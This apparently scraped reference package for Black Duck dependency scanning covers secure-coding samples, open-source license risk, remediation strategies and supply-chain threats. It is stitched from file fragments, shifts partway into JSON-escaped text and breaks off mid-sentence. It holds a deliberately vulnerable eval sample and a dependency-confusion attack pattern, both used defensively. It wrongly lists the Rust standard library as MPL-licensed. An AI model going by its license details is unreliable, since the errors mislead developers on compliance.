# Software Composition Analysis with Black Duck

## Overview

Perform comprehensive Software Composition Analysis (SCA) using Synopsys Black Duck to identify security vulnerabilities, license compliance risks, and supply chain threats in open source dependencies. This skill provides automated dependency scanning, vulnerability detection with CVE mapping, license risk analysis, and remediation guidance aligned with OWASP and NIST standards.

## Quick Start

Scan a project for dependency vulnerabilities:

Scan with policy violation enforcement:

## Core Workflows

### Workflow 1: Initial Dependency Security Assessme…

```python
, user_id):
    raise ValueError("Invalid user ID format")

# Use ORM query builders
user = User.query.filter_by(id=user_id).first()
```

**Step 4: Implement least privilege**
- Database user should have minimum required permissions
- Use read-only accounts for SELECT operations
- Never use admin/root accounts for application queries

### XSS Remediation

**Step 1: Enable auto-escaping**
- Most modern frameworks escape by default
- Ensure auto-escaping is not disabled

**Step 2: Use framework-specific safe methods**

```javascript
// React: Use JSX (auto-escapes)
<div>{userInput}</div>

// Vue: Use template syntax (auto-escapes)
<div>{{ userInput }}</div>

// Angular: Use property binding (auto-escapes)
<div [textContent]="userInput"></div>
```

**Step 3: Sanitize when HTML is required**

```javascript
import DOMPurify from 'dompurify';

// Sanitize HTML content
const clean = DOMPurify.sanitize(userHTML, {
  ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'p'],
  ALLOWED_ATTR: []
});
```

**Step 4: Content Security Policy (CSP)**

```html
<!-- Add CSP header -->
Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-{random}'
```

---

## Advanced Configuration

This section contains detailed configuration options and tuning parameters.

### Example: SAST Tool Configuration

```yaml
# Advanced security scanner configuration
scanner:
  # Severity threshold
  severity_threshold: MEDIUM

  # Rule configuration
  rules:
    enabled:
      - sql-injection
      - xss
      - hardcoded-secrets
    disabled:
      - informational-only

  # False positive reduction
  confidence_threshold: HIGH
  exclude_patterns:
    - "*/test/*"
    - "*/tests/*"
    - "*/node_modules/*"
    - "*.test.js"
    - "*.spec.ts"

  # Performance tuning
  max_file_size_kb: 2048
  timeout_seconds: 300
  parallel_jobs: 4

  # Output configuration
  output_format: json
  include_code_snippets: true
  max_snippet_lines: 10
```

---

## Examples and Code Samples

This section provides comprehensive code examples for various scenarios.

### Example 1: Secure API Authentication

```python
# Secure API key handling
import hmac
import os
from functools import wraps
from flask import Flask, request, jsonify

app = Flask(__name__)

# Load API key from environment (never hardcode)
VALID_API_KEY = os.environ.get('API_KEY')
if not VALID_API_KEY:
    raise ValueError("API_KEY environment variable not set")

def require_api_key(f):
    @wraps(f)
    def decorated_function(*args, **kwargs):
        api_key = request.headers.get('X-API-Key')

        if not api_key:
            return jsonify({'error': 'API key required'}), 401

        # Constant-time comparison to prevent timing attacks; compare bytes so a
        # non-ASCII header value cannot raise TypeError inside the handler
        if not hmac.compare_digest(api_key.encode('utf-8'), VALID_API_KEY.encode('utf-8')):
            return jsonify({'error': 'Invalid API key'}), 403

        return f(*args, **kwargs)
    return decorated_function

@app.route('/api/secure-endpoint')
@require_api_key
def secure_endpoint():
    return jsonify({'message': 'Access granted'})
```

### Example 2: Secure Password Hashing

```python
# Secure password storage with bcrypt
import bcrypt

def hash_password(password: str) -> str:
    """Hash a password using bcrypt."""
    # Generate salt and hash password
    salt = bcrypt.gensalt(rounds=12)  # Cost factor: 12 (industry standard)
    hashed = bcrypt.hashpw(password.encode('utf-8'), salt)
    return hashed.decode('utf-8')

def verify_password(password: str, hashed: str) -> bool:
    """Verify a password against a hash."""
    return bcrypt.checkpw(
        password.encode('utf-8'),
        hashed.encode('utf-8')
    )

# Usage
stored_hash = hash_password("user_password")
is_valid = verify_password("user_password", stored_hash)  # True
```

### Example 3: Secure File Upload

```python
# Secure file upload with validation
import os
import magic
from werkzeug.utils import secure_filename

ALLOWED_EXTENSIONS = {'pdf', 'png',
                      'jpg', 'jpeg'}
ALLOWED_MIME_TYPES = {
    'application/pdf',
    'image/png',
    'image/jpeg'
}
MAX_FILE_SIZE = 5 * 1024 * 1024  # 5 MB

def is_allowed_file(filename: str, file_content: bytes) -> bool:
    """Validate file extension and MIME type."""
    # Note: extension and MIME type are validated independently; map each allowed
    # extension to its expected MIME type if downstream code trusts the extension.
    # Check extension
    if '.' not in filename:
        return False

    ext = filename.rsplit('.', 1)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False

    # Check MIME type (prevent extension spoofing)
    mime = magic.from_buffer(file_content, mime=True)
    if mime not in ALLOWED_MIME_TYPES:
        return False

    return True

def handle_upload(file):
    """Securely handle file upload."""
    # Check file size
    file.seek(0, os.SEEK_END)
    size = file.tell()
    file.seek(0)

    if size > MAX_FILE_SIZE:
        raise ValueError("File too large")

    # Read content for validation
    content = file.read()
    file.seek(0)

    # Validate file type
    if not is_allowed_file(file.filename, content):
        raise ValueError("Invalid file type")

    # Sanitize filename
    filename = secure_filename(file.filename)

    # Generate unique filename to prevent overwrite attacks
    import uuid
    unique_filename = f"{uuid.uuid4()}_{filename}"

    # Save to secure location (outside web root)
    upload_path = os.path.join('/secure/uploads', unique_filename)
    file.save(upload_path)

    return unique_filename
```

---

## Best Practices for Reference Documents

1. **Start with "When to use"** - Help Claude know when to load this reference
2. **Include table of contents** - For documents >100 lines
3. **Use concrete examples** - Code samples with vulnerable and fixed versions
4. **Map to frameworks** - OWASP, CWE, MITRE ATT&CK for context
5. **Provide remediation** - Don't just identify issues, show how to fix them
6. **Organize logically** - Group related content, use clear headings
7. **Keep examples current** - Use modern patterns and current framework versions
8.
**Be concise** - Even in references, challenge every sentence

---

File: references/license_risk_guide.md

# License Compliance Risk Assessment Guide

## Table of Contents
- [License Risk Categories](#license-risk-categories)
- [Common Open Source Licenses](#common-open-source-licenses)
- [License Compatibility](#license-compatibility)
- [Compliance Workflows](#compliance-workflows)
- [Legal Considerations](#legal-considerations)

## License Risk Categories

### High Risk - Copyleft (Strong)

**Licenses**: GPL-2.0, GPL-3.0, AGPL-3.0

**Characteristics**:
- Requires derivative works to be open-sourced under same license
- Source code distribution mandatory
- AGPL extends to network use (SaaS applications)

**Business Impact**: HIGH
- May require releasing proprietary code as open source
- Incompatible with most commercial software
- Legal review required for any usage

**Use Cases Where Allowed**:
- Internal tools (not distributed)
- Separate services with network boundaries
- Dual-licensed components (use commercial license)

**Example Compliance Violation**:
```
Product: Commercial SaaS Application
Dependency: AGPL-licensed library linked into application
Issue: AGPL requires source code release for network-accessible software
Risk: Legal liability, forced open-sourcing
```

### Medium Risk - Weak Copyleft

**Licenses**: LGPL-2.1, LGPL-3.0, MPL-2.0, EPL-2.0

**Characteristics**:
- Copyleft applies only to modified library files
- Allows proprietary applications if library used as separate component
- Source modifications must be released

**Business Impact**: MEDIUM
- Safe if used as unmodified library (dynamic linking)
- Modifications require open-sourcing
- License compatibility considerations

**Compliance Requirements**:
- Keep
library as separate, unmodified component
- If modified, release modifications under same license
- Attribute properly in documentation

**Example Safe Usage**:
```
Product: Commercial Application
Dependency: LGPL library via dynamic linking
Status: COMPLIANT
Reason: No modifications, used as separate component
```

### Low Risk - Permissive

**Licenses**: MIT, Apache-2.0, BSD-2-Clause, BSD-3-Clause

**Characteristics**:
- Minimal restrictions on use and distribution
- No copyleft requirements
- Attribution required
- Apache-2.0 includes patent grant

**Business Impact**: LOW
- Generally safe for commercial use
- Simple compliance requirements
- Industry standard for most projects

**Compliance Requirements**:
- Include license text in distribution
- Preserve copyright notices
- Apache-2.0: Include NOTICE file if present

### Minimal Risk - Public Domain / Unlicense

**Licenses**: CC0-1.0, Unlicense, Public Domain

**Characteristics**:
- No restrictions
- No attribution required (though recommended)

**Business Impact**: MINIMAL
- Safest for commercial use
- No compliance obligations

## Common Open Source Licenses

### Permissive Licenses

#### MIT License

**SPDX**: MIT
**OSI Approved**: Yes
**Risk Level**: LOW

**Permissions**: Commercial use, modification, distribution, private use
**Conditions**: Include license and copyright notice
**Limitations**: No liability, no warranty

**Common in**: JavaScript (React, Angular), Ruby (Rails)

**Compliance Checklist**:
- [ ] Include LICENSE file in distribution
- [ ] Preserve copyright notices in source files
- [ ] Credit in ABOUT/CREDITS file

#### Apache License 2.0

**SPDX**: Apache-2.0
**OSI Approved**: Yes
**Risk Level**: LOW

**Permissions**: Same as MIT, plus explicit patent grant
**Conditions**: Include license, preserve NOTICE file, state changes
**Limitations**: No trademark use, no liability

**Common in**: Java (Spring), Big Data
(Hadoop, Kafka)

**Key Difference from MIT**: Patent protection clause

**Compliance Checklist**:
- [ ] Include LICENSE file
- [ ] Include NOTICE file if present
- [ ] Document modifications
- [ ] Don't use project trademarks

#### BSD Licenses (2-Clause and 3-Clause)

**SPDX**: BSD-2-Clause, BSD-3-Clause
**OSI Approved**: Yes
**Risk Level**: LOW

**3-Clause Addition**: No endorsement using project name

**Common in**: Unix utilities, networking libraries

**Compliance Checklist**:
- [ ] Include license text
- [ ] Preserve copyright notices
- [ ] BSD-3: No unauthorized endorsements

### Weak Copyleft Licenses

#### GNU LGPL 2.1 / 3.0

**SPDX**: LGPL-2.1, LGPL-3.0
**OSI Approved**: Yes
**Risk Level**: MEDIUM

**Safe Usage Patterns**:
1. **Dynamic Linking**: Link as shared library without modification
2. **Unmodified Use**: Use library as-is without code changes
3. **Separate Component**: Keep as distinct, replaceable module

**Unsafe Usage Patterns**:
1. **Static Linking**: Compiling LGPL code into proprietary binary
2. **Modifications**: Changing LGPL library code
3.
**Intimate Integration**: Tightly coupling with proprietary code

**Common in**: GTK, glibc, Qt (dual-licensed)

**Compliance for Unmodified Use**:
- [ ] Provide library source code or offer to provide
- [ ] Allow users to replace library
- [ ] Include license text

**Compliance for Modifications**:
- [ ] Release modifications under LGPL
- [ ] Provide modified source code
- [ ] Document changes

#### Mozilla Public License 2.0

**SPDX**: MPL-2.0
**OSI Approved**: Yes
**Risk Level**: MEDIUM

**File-Level Copyleft**: Only modified files must remain MPL

**Common in**: Firefox, Rust standard library

**Compliance**:
- [ ] Keep MPL files in separate files
- [ ] Release modifications to MPL files
- [ ] May combine with proprietary code at module level

### Strong Copyleft Licenses

#### GNU GPL 2.0 / 3.0

**SPDX**: GPL-2.0, GPL-3.0
**OSI Approved**: Yes
**Risk Level**: HIGH

**Copyleft Scope**: Entire program must be GPL

**Key Differences**:
- **GPL-3.0**: Added anti-tivoization, patent provisions
- **GPL-2.0**: More permissive for hardware restrictions

**Common in**: Linux kernel (GPL-2.0), many GNU tools

**When GPL is Acceptable**:
1. **Internal Use**: Not distributed outside organization
2. **Network Boundary**: Separate GPL service (API-based)
3.
**Dual-Licensed**: Use commercial license option

**Compliance if Using**:
- [ ] Entire program must be GPL-compatible
- [ ] Provide source code to recipients
- [ ] Include license and build instructions

#### GNU AGPL 3.0

**SPDX**: AGPL-3.0
**OSI Approved**: Yes
**Risk Level**: CRITICAL for SaaS

**Network Copyleft**: Source code required even for network use

**Common in**: Some database tools, server software

**Critical for**: SaaS, web applications, APIs

**Avoid Unless**: Prepared to open-source entire application

### Proprietary / Commercial Licenses

**Risk Level**: VARIES (requires legal review)

**Common Scenarios**:
- Evaluation/trial licenses (non-production)
- Dual-licensed (commercial option available)
- Runtime licenses (e.g., database drivers)

**Compliance**: Follow vendor-specific terms

## License Compatibility

### Compatibility Matrix

| Your Project | MIT | Apache-2.0 | LGPL | GPL | AGPL |
|--------------|-----|------------|------|-----|------|
| Proprietary  | ✅  | ✅         | ⚠️   | ❌  | ❌   |
| MIT          | ✅  | ✅         | ⚠️   | ❌  | ❌   |
| Apache-2.0   | ✅  | ✅         | ⚠️   | ⚠️  | ❌   |
| LGPL         | ✅  | ✅         | ✅   | ⚠️  | ❌   |
| GPL          | ✅  | ⚠️         | ✅   | ✅  | ⚠️   |
| AGPL         | ✅  | ⚠️         | ✅   | ✅  | ✅   |

**Legend**:
- ✅ Compatible
- ⚠️ Compatible with conditions
- ❌ Incompatible

### Common Incompatibilities

**Apache-2.0 with GPL-2.0**:
- Issue: GPL-2.0 doesn't have explicit patent grant
- Solution: Use GPL-3.0 instead (compatible with Apache-2.0)

**GPL with Proprietary**:
- Issue: GPL requires derivative works be GPL
- Solution: Keep as separate program, use network boundary

**AGPL with SaaS**:
- Issue: AGPL triggers on network use
- Solution: Avoid AGPL or use commercial license

## Compliance Workflows

### Initial License Assessment

1. **Scan Dependencies**
   ```bash
   scripts/blackduck_scan.py --project MyApp --version 1.0.0 --report-type license
   ```

2.
**Categorize Licenses by Risk**
   - Review all HIGH risk licenses immediately
   - Assess MEDIUM risk licenses for compliance requirements
   - Document LOW risk licenses for attribution

3. **Legal Review**
   - Escalate HIGH risk licenses to legal team
   - Get approval for MEDIUM risk usage patterns
   - Document decisions

### Continuous License Monitoring

**In CI/CD Pipeline**:
```yaml
# GitHub Actions example
- name: License Compliance Check
  run: |
    scripts/blackduck_scan.py \
      --project ${{ github.repository }} \
      --version ${{ github.sha }} \
      --report-type license \
      --fail-on-blocklisted-licenses
```

**Policy Enforcement**:
- Block builds with GPL/AGPL dependencies
- Require approval for new LGPL dependencies
- Auto-approve MIT/Apache-2.0

### License Remediation

**For High-Risk Licenses**:

1. **Replace Component**
   - Find MIT/Apache alternative
   - Example: MySQL (GPL) → PostgreSQL (PostgreSQL License - permissive)

2. **Commercial License**
   - Purchase commercial license if available
   - Example: Qt (LGPL or Commercial)

3. **Separate Service**
   - Run GPL component as separate service
   - Communicate via API/network

4. **Remove Dependency**
   - Implement functionality directly
   - Use different approach

### Attribution and Notices

**Required Artifacts**:

**LICENSES.txt** - All license texts:
```
This software includes the following third-party components:

1. Component Name v1.0.0
   License: MIT
   Copyright (c) 2024 Author
   [Full license text]

2.
Another Component v2.0.0
   License: Apache-2.0
   [Full license text]
```

**NOTICE.txt** - Attribution notices (if Apache-2.0 dependencies):
```
This product includes software developed by
The Apache Software Foundation (http://www.apache.org/).

[Additional NOTICE content from Apache-licensed dependencies]
```

**UI/About Screen**:
- List major third-party components
- Link to full license information
- Provide "Open Source Licenses" section

## Legal Considerations

### When to Consult Legal Counsel

**Always Consult for**:
- GPL/AGPL in commercial products
- Dual-licensing decisions
- Patent-related concerns
- Proprietary license negotiations
- M&A due diligence
- License violations/disputes

### Common Legal Questions

**Q: Can I use GPL code in a SaaS application?**
A: GPL-2.0/3.0 yes (no distribution), AGPL-3.0 no (network use triggers copyleft)

**Q: What if I modify an MIT-licensed library?**
A: You can keep modifications proprietary, just preserve MIT license

**Q: Can I remove license headers from code?**
A: No, preserve all copyright and license notices

**Q: What's the difference between "linking" and "use"?**
A: Legal concept varies by jurisdiction; consult attorney for specific cases

### Audit and Compliance Documentation

**Maintain Records**:
- Complete SBOM with license information
- License review approvals
- Component selection rationale
- Exception approvals with expiration dates

**Quarterly Review**:
- Update license inventory
- Review new dependencies
- Renew/revoke exceptions
- Update attribution files

## Tools and Resources

**Black Duck Features**:
- Automated license detection
- License risk categorization
- Policy enforcement
- Bill of Materials with licenses

**Additional Tools**:
- FOSSA - License compliance automation
- WhiteSource - License management
- Snyk - License scanning

**Resources**:
- [SPDX License List](https://spdx.org/licenses/)
- [Choose A
License](https://choosealicense.com/)
- [TL;DR Legal](https://tldrlegal.com/)
- [OSI Approved Licenses](https://opensource.org/licenses)

## License Risk Scorecard Template

```markdown
# License Risk Assessment: [Component Name]

**Component**: component-name@version
**License**: [SPDX ID]
**Risk Level**: [HIGH/MEDIUM/LOW]

## Usage Context
- [ ] Used in distributed product
- [ ] Used in SaaS/cloud service
- [ ] Internal tool only
- [ ] Modifications made: [Yes/No]

## Risk Assessment
- **Copyleft Trigger**: [Yes/No/Conditional]
- **Patent Concerns**: [Yes/No]
- **Commercial Use Allowed**: [Yes/No]

## Compliance Requirements
- [ ] Include license text
- [ ] Provide source code
- [ ] Include NOTICE file
- [ ] Preserve copyright notices
- [ ] Other: _______

## Decision
- [X] Approved for use
- [ ] Requires commercial license
- [ ] Find alternative
- [ ] Legal review pending

**Approved By**: [Name, Date]
**Review Date**: [Date]
```

## References

- [Open Source Initiative](https://opensource.org/)
- [Free Software Foundation](https://www.fsf.org/licensing/)
- [Linux Foundation - Open Compliance Program](https://www.linuxfoundation.org/projects/open-compliance)
- [Google Open Source License Guide](https://opensource.google/documentation/reference/thirdparty/licenses)

---

File: references/remediation_strategies.md

# Vulnerability Remediation Strategies

## Table of Contents
- [Remediation Decision Framework](#remediation-decision-framework)
- [Strategy 1: Upgrade to Fixed Version](#strategy-1-upgrade-to-fixed-version)
- [Strategy 2: Apply Security Patch](#strategy-2-apply-security-patch)
- [Strategy 3: Replace Component](#strategy-3-replace-component)
- [Strategy 4: Implement Mitigations](#strategy-4-implement-mitigations)
-
[Strategy 5: Risk Acceptance](#strategy-5-risk-acceptance)
- [Language-Specific Guidance](#language-specific-guidance)

## Remediation Decision Framework

```
Is patch/upgrade available?
├─ Yes → Can we upgrade without breaking changes?
│   ├─ Yes → UPGRADE (Strategy 1)
│   └─ No → Are breaking changes acceptable?
│       ├─ Yes → UPGRADE with refactoring (Strategy 1)
│       └─ No → Can we apply patch? (Strategy 2)
│           ├─ Yes → PATCH
│           └─ No → REPLACE or MITIGATE (Strategy 3/4)
│
└─ No → Is vulnerability exploitable in our context?
    ├─ Yes → Can we replace component?
    │   ├─ Yes → REPLACE (Strategy 3)
    │   └─ No → MITIGATE (Strategy 4)
    │
    └─ No → ACCEPT with justification (Strategy 5)
```

## Strategy 1: Upgrade to Fixed Version

**When to use**: Patch available in newer version, upgrade path is clear

**Priority**: HIGHEST - This is the preferred remediation method

### Upgrade Process

1. **Identify Fixed Version**
   ```bash
   # Check Black Duck scan results for fixed version
   # Verify in CVE database or component changelog
   ```

2. **Review Breaking Changes**
   - Read release notes and changelog
   - Check migration guides
   - Review API changes and deprecations

3. **Update Dependency**

   **Node.js/npm**:
   ```bash
   npm install package-name@fixed-version
   npm audit fix  # Auto-fix where possible
   ```

   **Python/pip**:
   ```bash
   pip install package-name==fixed-version
   pip-audit --fix  # Auto-fix vulnerabilities
   ```

   **Java/Maven**:
   ```xml
   <dependency>
     <groupId>org.example</groupId>
     <artifactId>vulnerable-lib</artifactId>
     <version>fixed-version</version>
   </dependency>
   ```

   **Ruby/Bundler**:
   ```bash
   bundle update package-name
   ```

   **.NET/NuGet**:
   ```bash
   dotnet add package PackageName --version fixed-version
   ```

4.
**Test Thoroughly**
   - Run existing test suite
   - Test affected functionality
   - Perform integration testing
   - Consider security-specific test cases

5. **Re-scan**
   ```bash
   scripts/blackduck_scan.py --project MyApp --version 1.0.1
   ```

### Handling Breaking Changes

**Minor Breaking Changes**: Acceptable for security fixes
- Update function calls to new API
- Adjust configuration for new defaults
- Update type definitions

**Major Breaking Changes**: Requires planning
- Create feature branch for upgrade
- Refactor code incrementally
- Use adapter pattern for compatibility
- Consider gradual rollout

**Incompatible Changes**: May require alternative strategy
- Evaluate business impact
- Consider Strategy 3 (Replace)
- If critical, implement Strategy 4 (Mitigate) temporarily

## Strategy 2: Apply Security Patch

**When to use**: Vendor provides patch without full version upgrade

**Priority**: HIGH - Use when full upgrade is not feasible

### Patch Types

**Backported Patches**:
- Vendor provides patch for older version
- Common in LTS/enterprise distributions
- Apply using vendor's instructions

**Custom Patches**:
- Create patch from upstream fix
- Test extensively before deployment
- Document patch application process

### Patch Application Process

1. **Obtain Patch**
   - Vendor security advisory
   - GitHub commit/pull request
   - Security mailing list

2. **Validate Patch**
   ```bash
   # Review patch contents
   git diff vulnerable-version..patched-version -- affected-file.js

   # Verify patch signature if available
   gpg --verify patch.sig patch.diff
   ```

3.
**Apply Patch**

   **Git-based**:
   ```bash
   # Apply patch from file
   git apply security-patch.diff

   # Or cherry-pick specific commit
   git cherry-pick security-fix-commit-sha
   ```

   **Package manager overlay**:
   ```bash
   # npm patch-package
   npx patch-package package-name

   # pip with local modifications
   pip install -e ./patched-package
   ```

4. **Test and Verify**
   - Verify vulnerability is fixed
   - Run security scan
   - Test functionality

5. **Document Patch**
   - Create internal documentation
   - Add to dependency management notes
   - Set reminder for proper upgrade

## Strategy 3: Replace Component

**When to use**: No fix available, or component is unmaintained

**Priority**: MEDIUM-HIGH - Architectural change required

### Replacement Process

1. **Identify Alternatives**

   **Evaluation Criteria**:
   - Active maintenance (recent commits, releases)
   - Security track record
   - Community size and support
   - Feature parity
   - License compatibility
   - Performance characteristics

   **Research Sources**:
   - Black Duck component quality metrics
   - GitHub stars/forks/issues
   - Security advisories history
   - StackOverflow activity
   - Production usage at scale

2. **Select Replacement**

   **Example Replacements**:

   | Vulnerable Component | Alternative | Reason |
   |----------------------|-------------|--------|
   | moment.js | date-fns, dayjs | No longer maintained |
   | request (npm) | axios, node-fetch | Deprecated |
   | xml2js | fast-xml-parser | XXE vulnerabilities |
   | lodash (full) | lodash-es (specific functions) | Reduce attack surface |

3. **Plan Migration**
   - Map API differences
   - Identify all usage locations
   - Create compatibility layer if needed
   - Plan gradual migration if large codebase

4.
**Execute Replacement**
   ```bash
   # Remove vulnerable component
   npm uninstall vulnerable-package

   # Install replacement
   npm install secure-alternative

   # Update imports/requires across codebase
   # Use tools like jscodeshift for automated refactoring
   ```

5. **Verify**
   - Scan for residual references
   - Test all affected code paths
   - Re-scan with Black Duck

## Strategy 4: Implement Mitigations

**When to use**: No fix/replacement available, vulnerability cannot be eliminated

**Priority**: MEDIUM - Compensating controls required

### Mitigation Techniques

#### Input Validation and Sanitization

For injection vulnerabilities:
```javascript
// Before: Vulnerable to injection
const result = eval(userInput);

// Mitigation: Strict validation and safe alternatives
const allowlist = ['option1', 'option2'];
if (!allowlist.includes(userInput)) {
  throw new Error('Invalid input');
}
const result = safeEvaluate(userInput);
```

#### Network Segmentation

For RCE/SSRF vulnerabilities:
- Deploy vulnerable component in isolated network segment
- Restrict outbound network access
- Use Web Application Firewall (WAF) rules
- Implement egress filtering

#### Access Controls

For authentication/authorization bypasses:
```python
# Additional validation layer
@require_additional_auth
def sensitive_operation():
    # Vulnerable library call
    vulnerable_lib.do_operation()
```

#### Runtime Protection

**Application Security Tools**:
- RASP (Runtime Application Self-Protection)
- Virtual patching via WAF
- Container security policies

**Example - WAF Rule**:
```nginx
# ModSecurity rule to block exploitation attempt
SecRule REQUEST_URI "@rx /vulnerable-endpoint" \
    "id:1001,phase:1,deny,status:403,\
    msg:'Blocked access to vulnerable component'"
```

#### Minimize Attack Surface

**Disable Vulnerable Features**:
```xml
<!-- Disable XXE in XML parser -->
<bean
class="javax.xml.parsers.DocumentBuilderFactory">
  <property name="features">
    <map>
      <entry key="http://apache.org/xml/features/disallow-doctype-decl" value="true"/>
      <entry key="http://xml.org/sax/features/external-general-entities" value="false"/>
    </map>
  </property>
</bean>
```

**Remove Unused Code**:
```bash
# Remove unused dependencies
npm prune
pip-autoremove

# Tree-shake unused code
webpack --mode production  # Removes unused exports
```

### Monitoring and Detection

Implement enhanced monitoring for vulnerable components:

```python
# Example: Log and alert on vulnerable code path usage
import functools
import inspect
import logging

def wrap_vulnerable_function(original_func):
    @functools.wraps(original_func)
    def wrapper(*args, **kwargs):
        caller = inspect.stack()[1]  # frame that invoked the vulnerable function
        logging.warning(
            "SECURITY: Vulnerable function called",
            extra={
                "function": original_func.__name__,
                # "args" is a reserved LogRecord attribute, so use a different key;
                # omit or redact the values if arguments may carry secrets or PII
                "call_args": args,
                "caller": f"{caller.filename}:{caller.lineno}"
            }
        )
        # Alert security team (send_security_alert is your own alerting hook)
        send_security_alert("Vulnerable code path executed")
        return original_func(*args, **kwargs)
    return wrapper

# Apply wrapper
vulnerable_lib.dangerous_function = wrap_vulnerable_function(
    vulnerable_lib.dangerous_function
)
```

## Strategy 5: Risk Acceptance

**When to use**: Vulnerability is not exploitable in your context, or risk is acceptable

**Priority**: LOWEST - Only after thorough risk analysis

### Risk Acceptance Criteria

**Acceptable when ALL of these are true**:
1. Vulnerability is not exploitable in deployment context
2. Attack requires significant preconditions (e.g., admin access)
3. Vulnerable code path is never executed
4. Impact is negligible even if exploited
5. Mitigation cost exceeds risk

### Risk Acceptance Process

1.
**Document Justification**
   ```markdown
   # Risk Acceptance: CVE-2023-XXXXX in component-name

   **Vulnerability**: SQL Injection in admin panel
   **CVSS Score**: 8.5 (HIGH)
   **Component**: component-name@version

   **Justification for Acceptance**:
   - Admin panel is only accessible to authenticated administrators
   - Additional authentication layer required (2FA)
   - Network access restricted to internal network only
   - No sensitive data accessible via this component
   - Monitoring in place for suspicious activity

   **Mitigation Controls**:
   - WAF rules blocking SQL injection patterns
   - Enhanced logging on admin endpoints
   - Network segmentation
   - Regular security audits

   **Review Date**: 2024-06-01
   **Approved By**: CISO, Security Team Lead
   **Next Review**: 2024-09-01
   ```

2. **Implement Compensating Controls**
   - Enhanced monitoring
   - Additional authentication layers
   - Network restrictions
   - Regular security reviews

3. **Set Review Schedule**
   - Quarterly reviews for HIGH/CRITICAL
   - Semi-annual for MEDIUM
   - Annual for LOW

4.
**Track in Black Duck**
   ```bash
   # Mark as accepted risk in Black Duck with expiration
   # Use Black Duck UI or API to create policy exception
   ```

## Language-Specific Guidance

### JavaScript/Node.js

**Tools**:
- `npm audit` - Built-in vulnerability scanner
- `npm audit fix` - Automatic remediation
- `yarn audit` - Yarn's vulnerability scanner
- `snyk` - Commercial SCA tool

**Best Practices**:
- Lock dependencies with `package-lock.json`
- Use `npm ci` in CI/CD for reproducible builds
- Audit transitive dependencies
- Consider `npm-force-resolutions` for forcing versions

### Python

**Tools**:
- `pip-audit` - Scan for vulnerabilities
- `safety` - Check against vulnerability database
- `pip-check` - Verify package compatibility

**Best Practices**:
- Use `requirements.txt` and `pip freeze`
- Pin exact versions for security-critical deps
- Use virtual environments
- Consider `pip-tools` for dependency management

### Java

**Tools**:
- OWASP Dependency-Check
- Snyk for Java
- Black Duck (commercial)

**Best Practices**:
- Use dependency management (Maven, Gradle)
- Lock versions in `pom.xml` or `build.gradle`
- Scan with `mvn dependency:tree` for transitive deps
- Use Maven Enforcer Plugin for version policies

### .NET

**Tools**:
- `dotnet list package --vulnerable`
- OWASP Dependency-Check
- WhiteSource Bolt

**Best Practices**:
- Use `PackageReference` in project files
- Lock versions with `packages.lock.json`
- Enable NuGet package validation
- Use `dotnet outdated` to track updates

### Ruby

**Tools**:
- `bundle audit` - Check for vulnerabilities
- `bundler-audit` - Automated checking

**Best Practices**:
- Use `Gemfile.lock` for reproducible deps
- Run `bundle audit` in CI/CD
- Update regularly with `bundle update`
- Use pessimistic version constraints

## Remediation Workflow Checklist

For each vulnerability:

- [ ] Identify vulnerability details (CVE, CVSS, affected
versions)\n- [ ] Determine if vulnerability is exploitable in your context (is the vulnerable code path reachable?)\n- [ ] Check for fixed version or patch availability\n- [ ] Assess upgrade/patch complexity and breaking changes\n- [ ] Select remediation strategy (Upgrade/Patch/Replace/Mitigate/Accept)\n- [ ] Create remediation plan with timeline\n- [ ] Execute remediation\n- [ ] Test thoroughly (functionality + security)\n- [ ] Re-scan with Black Duck to confirm fix\n- [ ] Document changes and lessons learned\n- [ ] Deploy to production with rollback plan\n- [ ] Monitor for issues post-deployment\n\n## References\n\n- [NIST National Vulnerability Database](https://nvd.nist.gov/)\n- [OWASP Vulnerable Dependency Management Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html)\n- [CISA Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Snyk Vulnerability Database](https://security.snyk.io/)\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":13491,"content_sha256":"b4ae33edff44fe8faec0dc77575ab61bc902c507a19aa8de42c13c44ecb0d3b7"},{"filename":"references/supply_chain_threats.md","content":"# Supply Chain Security Threats\n\n## Table of Contents\n- [Threat Overview](#threat-overview)\n- [Attack Vectors](#attack-vectors)\n- [Detection Strategies](#detection-strategies)\n- [Prevention and Mitigation](#prevention-and-mitigation)\n- [Incident Response](#incident-response)\n\n## Threat Overview\n\nSupply chain attacks target the software dependency ecosystem to compromise applications through malicious or vulnerable third-party components.\n\n**Impact**: Critical - can affect thousands of downstream users\n**Trend**: Increasing rapidly (Sonatype's 2022 report measured a 742% average annual increase in supply chain attacks over the preceding three years)\n**MITRE ATT&CK**: T1195 - Supply Chain Compromise\n\n### Attack Categories\n\n1. **Compromised Dependencies** - Legitimate packages backdoored by attackers\n2. **Typosquatting** - Malicious packages with similar names\n3. 
**Dependency Confusion** - Exploiting package resolution order\n4. **Malicious Maintainers** - Attackers become maintainers\n5. **Build System Compromise** - Injection during build/release process\n\n## Attack Vectors\n\n### 1. Dependency Confusion\n\n**MITRE ATT&CK**: T1195.001\n**CWE**: CWE-494 (Download of Code Without Integrity Check)\n\n**Attack Description**:\nAttackers publish malicious packages to public registries with the same name as internal packages. A package manager that consults both registries and prefers the highest version installs the public version instead of the internal one.\n\n**Real-World Examples**:\n- **2021**: Researcher Alex Birsan demonstrated the technique by uploading packages mimicking internal names used at Microsoft, Apple, PayPal and others\n- **Impact**: Code execution on developer machines and build servers\n\n**Attack Pattern**:\n```\nInternal Package Registry (private):\n - company-auth-lib@1.0.0\n\nPublic Registry (npmjs.com):\n - company-auth-lib@99.0.0 (MALICIOUS)\n\nPackage manager resolution:\n npm install company-auth-lib\n → Installs v99.0.0 from public registry (higher version)\n```\n\n**Detection with Black Duck**:\n- Unexpected package source changes\n- Version spikes (jumping from 1.x to 99.x)\n- Multiple registries for same package\n- New publishers for established packages\n\n**Prevention**:\n```bash\n# npm - use scoped packages for internal code\nnpm config set @company:registry https://npm.internal.company.com\n\n# Configure .npmrc so the internal scope never leaves the internal registry\n@company:registry=https://npm.internal.company.com\nregistry=https://registry.npmjs.org\n\n# Python - point at the internal index only. Do NOT use --extra-index-url for this:\n# it lets pip pick the highest version from either index, which is the attack itself\npip install --index-url https://pypi.internal.company.com package-name\n\n# Maven - route all resolution through one internal mirror in settings.xml.\n# A \u003crepositories> block in 